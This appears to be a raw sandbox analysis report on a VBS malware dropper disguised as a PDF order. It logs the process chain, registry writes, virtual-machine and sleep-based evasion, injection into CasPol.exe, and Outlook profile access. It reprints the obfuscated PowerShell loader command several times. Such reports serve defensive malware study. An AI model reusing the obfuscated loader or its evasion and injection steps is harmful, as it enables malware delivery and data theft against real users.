Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 17_2_1D2AB1D5 NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process Stats: CPU usage > 98%
Source: Ordine n.47201 pdf.vbs | Initial sample: Strings found which are bigger than 50
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Section loaded: security.dll
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ordine n.47201 pdf.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skoleeksempel = """SmADrdZodSy-CoTblySapCeeCh Lo-UnTOryHapUdeFoDMaeSyfCaiMhnNaiPhtPriFoopenpe Uf'teuResBliHenSmgGe TaSSkyOpsQutUeeanmBo;BauDosFriAlnOrgJe KaSFjyMisSptVmeDrmra.CoRBauTunVatwaipamSaeTr.viIManUntGieOmrBaoHuphySGoeImrApvTriOmcCleOvsNa;PopAfuChbKulDuiMocDo DasLetAnaButLyipocJo ArcfelUnaAmsHesNo DiSudtNouSpeInoBurScgRelAseElrOvsAx1Re Ti{Pr[suDWhlFolFeIRimUnpAzoSurPatst(En`"""AswOpimanInsAspCaonooFolSg.RedNgrEkvRe`"""Po)Ho]FrpTruEmbSelZeiChcDj BisKatGlaPrtImiGecHe PaeObxFotReeMirBrnca LiiAcnSutel EnPDerEfiFonBatMaeFirAfMSceCosTesAdaDigHeeMiBPeoApxVa(MeiSunRetBa SkSHytOpaHebRrlSt,asiBunBatSc SydSneAdlDeaUngoptFo,PriBinBitRo SkCunrPuoBl,LaiTunHytLa NoRFriBevReuValUn,RaiRonCatEt EpTMarFroBapKeiEfcBa,SeirunMotLl CoSVakSeiBotFosReecr)Bi;Cy[rtDMulBalAtILimLapFeoRerImtIn(Ra`"""KlAUnDEuVLeAAcPBaIAf3Fr2Pa.CoDAnLHaLLg`"""Tu)Sp]RepGruJubMulStiOscoc masFatReaUntRaiStcKn ReePrxPitdeeBerEnnSi AniGanSgtAa snRIneBrgErQGouBaeOlrfryTrIDenClfChoEnKWieTrySt(MaiStnFltMi NoPSpoDutAdtTeeHynsu,PriPrnsatFr OrTSkeSolUneReoArlDe,AkiInnBetfo CoPRelSauMerUn,LeiUnnLatFl dyFSyuFisEfiImoStnAt,OuiIonCuthe AasBeaIllWa,BaiPonAntRk KoSGiaUnuUn,NyiGinSrtBo StkLoasnlReken,GriArnmetDi HyWtaeTaeAf,OdiEmnFltIr NuGAboHedGikKo,SiiTonBrtIm MeSovyMonHaaBinRo,VeiRenAatCa BrPAgeByaSj,VaiHanPhtgo NiBBriNorGakPl)Sa;Su[anDRelRalMoISemHopYooPerSntVi(Re`"""DikWieVorPrnKoesmlQu3Gl2Os`"""Un)Sl]bopInuGabKalAmiFlcFu RnsFetStaPrtAsiCecOv BreZoxswtSteRerAmnOp StiHanCytPh TeDRauDrpRelSoiHocKnaMutAneMuHIraAmnFodMilLeeSi(RoiSpnBatOp SpHMijGaeun,UniGunQutTr CrMLoeAkeAvtEsiBenFl,ReiMonAmtur HoUGonUnoUnrSj,dyiRanTitFl KaemoxBeaGecPr,DdiPhnEktTu BaOMavPieBrrBi,DiiTinMitRc UdBFaiDyoOumSyepecDi,MiiBunXitOp OnSMiihulPauSk)Pr;Kr[ThDBalAflBaIInmFopDeoRorOptUn(Rh`"""mokFoeSprPrnExeAmlAd3He2Op`"""Ld)Un]FepAbuFebSklDeiIncSn AfsNetKeaEqtSaiSucSt 
SaeGrxdatAneIrrRenAm NeiPenDitdo FoVfeiWorBltCeuOpaFllAnAInlBilUaoSucEl(MoiSunFatNo PrvDe1Ba,FdiTrnuntFo FivAl2Tr,WeiSpnSttKa CovFo3Fo,OsiGanWitRe SavBe4Ca)Vi;Ou[KaDPalKrlfiIAnmScpVioXyrTitMe(ax`"""MauMesWieTarEk3Di2Kr`"""Fa)Ne]CapLeuWobMalYdiIncAn BosExtGraFrtCiiCocEt OpeVaxEntZueGnrKande AliTinMaton UsGfeeNetVePOvrKloThpAl(CoiFinFatBr UrEdegEnyTo,naiTinBatLs LeSBehNeati)As;Ma[SiDPllNelDuICamvapSgoShrWatTy(Te`"""UnuJosDeeCarCo3Sy2gu`"""Fi)Ur]SkpStuAnbHylHeiLycAg SmsMitSuaTitOdiVacli BoeRwxTrtSkeVerUnnNo hyiMonLitEu blCThrOveBraIntFleTjCTiuOprAtsTroIorPr(FoiDenTitEf glMIseUnlUnlFy,GeitansotMa koREkrHalIm,BuiSknErtAw SuFRilPoyTagSo,StiImnLatKo AcfBeaImsIntSplBe,PiiadnBrtPr CrBReaAgaBenSt1Fo1Pu1Ha,HyiStnTytUn StPHasFoeDauDi,ShiEnnEdtbg NoQCouacaPrkPieIdrSt)Te;Is[stDStlSulYmIChmMapAfoUdrPotTa(Bo`"""AmaDodBuvSpaUfpzoiCo3Ba2Bi`"""sh)Va]SapUnuAabGelHaiBecUn ArsSutJuaOktHaiOncPe CoeprxIctsreterTinBi ToiLanNutPo LySDuehytArSSbeCorHivBiiChcPreSaBMaiFjtWesFr(SniSlnSatEr AfGUnaBerRe,NsiPenTytli HuTUdeKonAhogrnDi,MoitanFltTe JoDZoeSesBapKr,maiTrnSutSa GyEEvxUdpKl
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESEEA4.tmp" "c:\Users\user\AppData\Local\Temp\i3ontxzb\CSC7271579FEF14719AB8809EB2A5F450.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_1D2AAAB6 AdjustTokenPrivileges,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_1D2AAA7F AdjustTokenPrivileges,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cooiigyo.4mo.ps1
        Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@13/10@3/3
        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.ini
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5860:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5932:120:WilError_01
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ordine n.47201 pdf.vbs"
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
        Source: Binary string: l;C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.pdb source: powershell.exe, 00000003.00000002.601070377.0000000004CE1000.00000004.00000800.00020000.00000000.sdmp

        Data Obfuscation

        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell");IWshShell3.Exec("CMD.EXE /c echo %windir%");IHost.CreateObject("WScript.Shell");IWshShell3.Exec("CMD.EXE /c echo %windir%");IWshExec.StdOut();ITextStream.ReadLine();IWshShell3.RegWrite("HKEY_CURRENT_USER\Necrological\Ignoreringers\Skifret", "6wJcQOsCOQG60O6XBOsCm9txAZuB6hLiwCxxAZtxAZuBwj60KijrAptvcQGb6wLsresCgvjr", "REG_SZ");IFileSystem3.FileExists("C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe");IShellDispatch6.ShellExecute("C:\Windows\syswow64\WindowsPowerShell\v", " "$Skoleeksempel = """SmADrdZodSy-CoTbl", "", "", "0")
        Source: Yara matchFile source: 00000011.00000000.507338046.0000000000F20000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_200F1288 push ss; iretd
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_201058B0 push 0000001Fh; ret
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.cmdline
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.dll
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Program Files\qga\qga.exe
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | File opened: C:\Program Files\qga\qga.exe
        Source: Initial file | Initial file: do while timer-temp<sec
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2344 | Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 5860 | Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 5860 | Thread sleep count: 382 > 30
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 5860 | Thread sleep time: -11460000s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 5860 | Thread sleep time: -30000s >= -30000s
        Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Last function: Thread delayed
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8949
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Window / User API: threadDelayed 382
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Evasive API call chain: RegQueryValue,DecisionNodes,Sleep
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Thread delayed: delay time: 30000
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | System information queried: ModuleInformation
        Source: wscript.exe, 00000000.00000002.259228881.0000012BBB50F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Process token adjusted: Debug
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 17_2_20105110 LdrInitializeThunk,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Memory allocated: page read and write | page guard
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$skoleeksempel = """smadrdzodsy-cotblysapceech lo-untoryhapudefodmaesyfcaimhnnaiphtprifoopenpe uf'teuresblihensmgge tasskyopsqutueeanmbo;baudosfrialnorgje kasfjymissptvmedrmra.corbautunvatwaipamsaetr.viimanuntgieomrbaohuphysgoeimrapvtriomccleovsna;popafuchbkulduimocdo dasletanabutlyipocjo arcfelunaamshesno disudtnouspeinoburscgrelaseelrovsax1re ti{pr[sudwhlfolfeirimunpazosurpatst(en`"""aswopimaninsaspcaonoofolsg.redngrekvre`"""po)ho]frptruembselzeichcdj biskatglaprtimigeche paeobxfotreemirbrnca liiacnsutel enpderefifonbatmaefirafmscecostesadadigheemibpeoapxva(meisunretba skshytopahebrrlst,asibunbatsc sydsneadldeaungoptfo,pribinbitro skcunrpuobl,laitunhytla norfribevreuvalun,raironcatet eptmarfrobapkeiefcba,seirunmotll cosvakseibotfosreecr)bi;cy[rtdmulbalatilimlapfeorerimtin(ra`"""klaundeuvleaacpbaiaf3fr2pa.codanlhallg`"""tu)sp]repgrujubmulstioscoc masfatreauntraistckn reeprxpitdeeberennsi anigansgtaa snrinebrgerqgoubaeolrfrytridenclfchoenkwietryst(maistnfltmi nopspodutadtteehynsu,priprnsatfr ortskesolunereoarlde,akiinnbetfo coprelsaumerun,leiunnlatfl dyfsyufisefiimostnat,ouiioncuthe aasbeaillwa,baiponantrk kosgiaunuun,nyiginsrtbo stkloasnlreken,griarnmetdi hywtaetaeaf,odiemnfltir nugabohedgikko,siitonbrtim mesovymonhaabinro,veirenaatca brpagebyasj,vaihanphtgo nibbrinorgakpl)sa;su[andrelralmoisemhopyoopersntvi(re`"""dikwievorprnkoesmlqu3gl2os`"""un)sl]bopinugabkalamiflcfu rnsfetstaprtasicecov brezoxswtstereramnop stihancytph tedraudrprelsoihocknamutanemuhiraamnfodmilleesi(roispnbatop sphmijgaeun,unigunquttr crmloeakeavtesibenfl,reimonamtur hougonunounrsj,dyirantitfl kaemoxbeagecpr,ddiphnekttu baomavpiebrrbi,diitinmitrc udbfaidyooumsyepecdi,miibunxitop onsmiihulpausk)pr;kr[thdbalaflbaiinmfopdeororoptun(rh`"""mokfoesprprnexeamlad3he2op`"""ld)un]fepabufebskldeiincsn afsnetkeaeqtsaisucst 
saegrxdataneirrrenam neipenditdo fovfeiworbltceuopafllanainlbiluaosucel(moisunfatno prvde1ba,fditrnuntfo fival2tr,weispnsttka covfo3fo,osiganwitre savbe4ca)vi;ou[kadpalkrlfiianmscpvioxyrtitme(ax`"""maumeswietarek3di2kr`"""fa)ne]capleuwobmalydiincan bosextgrafrtciicocet opevaxentzuegnrkande alitinmaton usgfeenetvepovrklothpal(coifinfatbr uredegenyto,naitinbatls lesbehneati)as;ma[sidpllnelduicamvapsgoshrwatty(te`"""unujosdeecarco3sy2gu`"""fi)ur]skpstuanbhylheilycag smsmitsuatitodivacli boerwxtrtskeverunnno hyimonliteu blcthrovebraintfletjctiuopratstroiorpr(foidentitef glmiseunlunlfy,geitansotma korekrhalim,buisknertaw sufrilpoytagso,stiimnlatko acfbeaimsintsplbe,piiadnbrtpr crbreaagabenst1fo1pu1ha,hyistntytun stphasfoedaudi,shiennedtbg noqcouacaprkpieidrst)te;is[stdstlsulymichmmapafoudrpotta(bo`"""amadodbuvspaufpzoico3ba2bi`"""sh)va]sapunuaabgelhaibecun arssutjuaokthaioncpe coeprxictsretertinbi toilannutpo lysduehytarssbecorhivbiichcpresabmaifjtwesfr(snislnsater afgunaberre,nsipentytli hutudekonahogrndi,moitanfltte jodzoesesbapkr,maitrnsutsa gyeevxudpkl
        Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skoleeksempel = """SmADrdZodSy-CoTblySapCeeCh Lo-UnTOryHapUdeFoDMaeSyfCaiMhnNaiPhtPriFoopenpe Uf'teuResBliHenSmgGe TaSSkyOpsQutUeeanmBo;BauDosFriAlnOrgJe KaSFjyMisSptVmeDrmra.CoRBauTunVatwaipamSaeTr.viIManUntGieOmrBaoHuphySGoeImrApvTriOmcCleOvsNa;PopAfuChbKulDuiMocDo DasLetAnaButLyipocJo ArcfelUnaAmsHesNo DiSudtNouSpeInoBurScgRelAseElrOvsAx1Re Ti{Pr[suDWhlFolFeIRimUnpAzoSurPatst(En`"""AswOpimanInsAspCaonooFolSg.RedNgrEkvRe`"""Po)Ho]FrpTruEmbSelZeiChcDj BisKatGlaPrtImiGecHe PaeObxFotReeMirBrnca LiiAcnSutel EnPDerEfiFonBatMaeFirAfMSceCosTesAdaDigHeeMiBPeoApxVa(MeiSunRetBa SkSHytOpaHebRrlSt,asiBunBatSc SydSneAdlDeaUngoptFo,PriBinBitRo SkCunrPuoBl,LaiTunHytLa NoRFriBevReuValUn,RaiRonCatEt EpTMarFroBapKeiEfcBa,SeirunMotLl CoSVakSeiBotFosReecr)Bi;Cy[rtDMulBalAtILimLapFeoRerImtIn(Ra`"""KlAUnDEuVLeAAcPBaIAf3Fr2Pa.CoDAnLHaLLg`"""Tu)Sp]RepGruJubMulStiOscoc masFatReaUntRaiStcKn ReePrxPitdeeBerEnnSi AniGanSgtAa snRIneBrgErQGouBaeOlrfryTrIDenClfChoEnKWieTrySt(MaiStnFltMi NoPSpoDutAdtTeeHynsu,PriPrnsatFr OrTSkeSolUneReoArlDe,AkiInnBetfo CoPRelSauMerUn,LeiUnnLatFl dyFSyuFisEfiImoStnAt,OuiIonCuthe AasBeaIllWa,BaiPonAntRk KoSGiaUnuUn,NyiGinSrtBo StkLoasnlReken,GriArnmetDi HyWtaeTaeAf,OdiEmnFltIr NuGAboHedGikKo,SiiTonBrtIm MeSovyMonHaaBinRo,VeiRenAatCa BrPAgeByaSj,VaiHanPhtgo NiBBriNorGakPl)Sa;Su[anDRelRalMoISemHopYooPerSntVi(Re`"""DikWieVorPrnKoesmlQu3Gl2Os`"""Un)Sl]bopInuGabKalAmiFlcFu RnsFetStaPrtAsiCecOv BreZoxswtSteRerAmnOp StiHanCytPh TeDRauDrpRelSoiHocKnaMutAneMuHIraAmnFodMilLeeSi(RoiSpnBatOp SpHMijGaeun,UniGunQutTr CrMLoeAkeAvtEsiBenFl,ReiMonAmtur HoUGonUnoUnrSj,dyiRanTitFl KaemoxBeaGecPr,DdiPhnEktTu BaOMavPieBrrBi,DiiTinMitRc UdBFaiDyoOumSyepecDi,MiiBunXitOp OnSMiihulPauSk)Pr;Kr[ThDBalAflBaIInmFopDeoRorOptUn(Rh`"""mokFoeSprPrnExeAmlAd3He2Op`"""Ld)Un]FepAbuFebSklDeiIncSn AfsNetKeaEqtSaiSucSt 
SaeGrxdatAneIrrRenAm NeiPenDitdo FoVfeiWorBltCeuOpaFllAnAInlBilUaoSucEl(MoiSunFatNo PrvDe1Ba,FdiTrnuntFo FivAl2Tr,WeiSpnSttKa CovFo3Fo,OsiGanWitRe SavBe4Ca)Vi;Ou[KaDPalKrlfiIAnmScpVioXyrTitMe(ax`"""MauMesWieTarEk3Di2Kr`"""Fa)Ne]CapLeuWobMalYdiIncAn BosExtGraFrtCiiCocEt OpeVaxEntZueGnrKande AliTinMaton UsGfeeNetVePOvrKloThpAl(CoiFinFatBr UrEdegEnyTo,naiTinBatLs LeSBehNeati)As;Ma[SiDPllNelDuICamvapSgoShrWatTy(Te`"""UnuJosDeeCarCo3Sy2gu`"""Fi)Ur]SkpStuAnbHylHeiLycAg SmsMitSuaTitOdiVacli BoeRwxTrtSkeVerUnnNo hyiMonLitEu blCThrOveBraIntFleTjCTiuOprAtsTroIorPr(FoiDenTitEf glMIseUnlUnlFy,GeitansotMa koREkrHalIm,BuiSknErtAw SuFRilPoyTagSo,StiImnLatKo AcfBeaImsIntSplBe,PiiadnBrtPr CrBReaAgaBenSt1Fo1Pu1Ha,HyiStnTytUn StPHasFoeDauDi,ShiEnnEdtbg NoQCouacaPrkPieIdrSt)Te;Is[stDStlSulYmIChmMapAfoUdrPotTa(Bo`"""AmaDodBuvSpaUfpzoiCo3Ba2Bi`"""sh)Va]SapUnuAabGelHaiBecUn ArsSutJuaOktHaiOncPe CoeprxIctsreterTinBi ToiLanNutPo LySDuehytArSSbeCorHivBiiChcPreSaBMaiFjtWesFr(SniSlnSatEr AfGUnaBerRe,NsiPenTytli HuTUdeKonAhogrnDi,MoitanFltTe JoDZoeSesBapKr,maiTrnSutSa GyEEvxUdpKl
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.cmdline
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESEEA4.tmp" "c:\Users\user\AppData\Local\Temp\i3ontxzb\CSC7271579FEF14719AB8809EB2A5F450.TMP"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
